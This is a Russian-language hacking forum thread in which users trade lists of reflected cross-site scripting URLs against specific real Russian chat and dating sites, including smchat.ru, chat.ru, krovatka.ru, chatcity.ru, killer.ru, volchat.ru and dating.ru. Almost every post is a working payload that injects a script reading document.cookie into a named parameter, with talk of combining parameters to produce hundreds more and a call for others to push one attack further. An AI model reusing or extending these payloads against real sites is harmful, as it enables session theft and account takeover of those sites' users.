После небольшого затишья своей активности, выкладываю кое что на закуску. [size=+2]SMCHAT.RU[/size] ======================= http://www.smchat.ru/?key="><script>alert(document.cookie)</script> http://www.smchat.ru/?chatname=&key="><script>alert(document.cookie)</script> http://www.smchat.ru/?ontopic=default&login="><script>alert(document.cookie)</script> http://www.smchat.ru/?activate=&login="><script>alert(document.cookie)</script> http://www.smchat.ru/?password1=&login="><script>alert(document.cookie)</script> http://www.smchat.ru/?det=default&login="><script>alert(document.cookie)</script> http://www.smchat.ru/?count=1000&key="><script>alert(document.cookie)</script> http://www.smchat.ru/?email=&key="><script>alert(document.cookie)</script> ======================= Впрочем есть ещё пассивки, но думаю для начала этого хватит.
[size=+2]CHAT.RU[/size] ======================= http://www.chat.ru/user/register.html?dop10=default&confemail="><script>alert(document.cookie)</script> http://www.chat.ru/user/register.html?anotherpw="><script>alert(document.cookie)</script> http://www.chat.ru/user/register.html?city=&name="><script>alert(document.cookie)</script> http://www.chat.ru/user/register.html?action=default&username="><script>alert(document.cookie)</script> http://www.chat.ru/user/register.html?city=&year="><script>alert(document.cookie)</script> ======================= Опять же не весь список. Комбинируя запросы можно хоть сотни таких xss реализовать.
Что касается SMCHAT... ты првел много ссылок, но в итоге надо оставить тока: http://www.smchat.ru/?key="><script>alert(document.cookie)</script> http://www.smchat.ru/?login="><script>alert(document.cookie)</script> т.к. именно в этих параметрах ты приводил, выход XSS, а остальные ссылки, это льши комбинации...
[size=+2]KROVATKA.RU[/size] Вот и добрались ======================= При нажатии Отмена, xss срабатывает: Code: [color=darkorange]http://klubnichka.krovatka.ru/k?f=45&newwin=1&id2=5816&id=5673xee7kY1Y&c=8"><script>alert(document.cookie)</script> ----------------------------------------- http://klubnichka.krovatka.ru/f/e.cgi?c=6&n="><script>alert(document.cookie)%3B</script> http://klubnichka.krovatka.ru/people/pp33.cgi?ch=6&nn="><script>alert(document.cookie)%3B</script> http://klubnichka.krovatka.ru/sms/xp.cgi?mn="><script>alert(document.cookie)%3B</script>&ch=6&flag=0 http://klubnichka.krovatka.ru/people/pp33.cgi?ch=6&nn=%3Cmeta+http-equiv=%3E%3C/title%3E%20%3Cscript%3Ealert(document.cookie)%3C/script%3E[/color] ======================= XSS Нашли [sL1p] & blackybr
Killer.ru _http://chat.killer.ru/cgi-bin/chat.cgi?session=&room=21&form="><script>alert()</script> При входе по данной ссылке вылезает алерт и Code: Cache-Control: no-store Pragma: no-cache Content-Type: text/html; charset="us-ascii" Can't open form template. formpath: servername: chat.killer.ru file: /home/serg/chat-2.01/chat-html/">.html И тут вот сайтик к ним относится тоже: _http://chat.qwe.ru/index/search.php?q="><script>alert(document.cookie)</script> Всё отлично вылетает...
[size=+2]CHATCITY.RU[/size] Ухх как xss пошли то=) Уязвимость существует в скрипте отправки сообщений на какой либо ник. Например: Code: [color=darkorange]http://www.Chat ID.chatcity.ru/people/pp33.cgi?c=Chat ID&nn=[sL1p][/color] Вместо ника, подставляем наш код. В итоге: Code: [color=darkorange]http://www.Chat ID.chatcity.ru/people/pp33.cgi?c=Chat ID&nn="><script>alert(document.cookie)</script>[/color] Chat ID заменяем на адрес чата. У всех они в цифровом значении.
Killer.ru Code: _http://chat.killer.ru/cgi-bin/chat.cgi?room=21&form=p_main&other_name="><script>alert(document.cookie)</script> Выплёвывает такую фигню: Code: &last_msg_p="+last_msg; tmp_count++; count_reload++; s=s+"&tmp_count="+tmp_count; hidden.location.href=s; chatstatus((count_reload>2)?1:0); setTimeout("main_reload()", refresh_time); } // === newmsg function add_txt_home(t) { if (msg && msg.new_msg && msg.new_msg.old_message && t) { msg.new_msg.old_message.value = t + msg.new_msg.old_message.value; msg.re_set(); } } function add_txt_end(t) { if (msg && msg.new_msg && msg.new_msg.old_message && t) { msg.new_msg.old_message.value = msg.new_msg.old_message.value + t; msg.re_set(); } } // === execute check_refresh_time(); clr_mmas(); setTimeout("main_reload()", 7000); var smile_on=; // === оформление function smile_txt(to_me,s) { if (!s) return ""; if (to_me && smile_sound=="") smile_sound=s; if (smile_on) return "[img]http://killer.ru/extras/smile/%22+s+%22.gif[/img]"; return "*"+s; } function mail_txt(s) { if (!s) return ""; return "[u]"+s+"[/u]"; } function url_txt(mode,s) { if (!s) return ""; return "[u]"+s+"[/u]"; } function getval(v) { if (v<10) return "0"+v; return v; } function getdate(t) { if (!t || t<=0) return ""; var d = new Date(1970,1,1); d.setTime(t*1000); var hh=d.getHours(); var nn=d.getMinutes(); var ss=d.getSeconds(); return(getval(hh)+":"+getval(nn)+":"+getval(ss)); } function addmsg(for_me,n,t,nick_color,nick,msg_color,n_msg) { nick_color='6699FF'; var s=""; var tt=getdate(t); var St="["+tt+"] "; if (for_me) set_sound=1; s=St+""+nick+": "+n_msg+" alert(document.cookie)alert(document.cookie)alert(document.cookie)\n"; add_msg(n,s); } var user_status=3; function put_user_status(t) { var s; if (t==1) s="офлайн"; else if (t==2) s="онлайн"; else if (t==0) s="ушел"; else return; user_status = t; if (msg && msg.ou_status) msg.ou_status.innerHTML = s; } var smiles_flag=0; function show_smiles() { translit_flag=0; if (smiles_flag==1) { leftframe.rows="0,67,*,0,0,49,0"; smiles_flag=0; } else { leftframe.rows="0,67,*,30,0,49,0"; smiles_flag=1; } msg.re_set(); } var translit_flag=0; function translit_show() { smiles_flag=0; if (translit_flag==1) { leftframe.rows="0,67,*,0,0,49,0"; translit_flag=0; } else { leftframe.rows="0,67,*,0,49,49,0"; translit_flag=1; } msg.re_set(); } " scrolling=no marginheight=0 noresize frameborder=0 border=0> " scrolling=no marginheight=0 noresize frameborder=0 border=0> " scrolling=no marginheight=0 noresize frameborder=0 border=0> Может кто добъёт?! ))))) volchat.ru (Первый по поиску чатов) Code: _http://volchat.ru/people/pp1.cgi?c=13397&mn="><script>alert(document.cookie)</script> _http://volchat.ru/kpobatka?f="><script>alert(document.cookie)</script> (+)_http://www.postcard.ru/?to="><script>alert(document.cookie)</script> dating.ru Code: http://dating.ru/reg_code.php?details=yes&rndnum="><script>alert(document.cookie)</script> http://dating.ru/reg.php?rndnum="><script>alert(document.cookie)</script>
